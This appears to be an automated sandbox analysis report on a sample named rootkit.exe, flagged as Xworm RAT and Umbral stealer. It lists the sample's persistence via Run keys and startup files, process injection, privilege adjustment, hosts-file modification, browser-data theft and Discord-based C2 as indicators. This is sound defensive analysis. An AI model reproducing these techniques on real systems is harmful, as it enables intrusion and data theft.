Malware Analysis Report

2024-10-10 09:55

Sample ID 240709-blql3s1crg
Target rootkit.exe
SHA256 f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc
Tags
umbral xworm execution persistence rat spyware stealer trojan evasion
score
10/10

Analysis Overview

score
10/10

SHA256

f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc

Threat Level: Known bad

The file rootkit.exe was found to be: Known bad.

Malicious Activity Summary

umbral xworm execution persistence rat spyware stealer trojan evasion

Detect Xworm Payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Umbral

Modifies security service

Detect Umbral payload

Xworm

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Checks computer location settings

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Modifies data under HKEY_USERS

Uses Task Scheduler COM API

Suspicious use of UnmapMainImage

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Detects videocard installed

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-09 01:14

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-09 01:14

Reported

2024-07-09 01:17

Platform

win10v2004-20240708-en

Max time kernel

150s

Max time network

151s

Command Line

winlogon.exe

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2956 created 612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\rootkit.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe" C:\Users\Admin\AppData\Local\Temp\rootkit.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\XClient C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2956 set thread context of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1720487765" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1884 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 1884 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 1884 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 1884 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 1884 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3184 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3184 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3184 wrote to memory of 3348 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3184 wrote to memory of 3348 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 1884 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 1884 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 1884 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 1884 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 3184 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3184 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3184 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3184 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
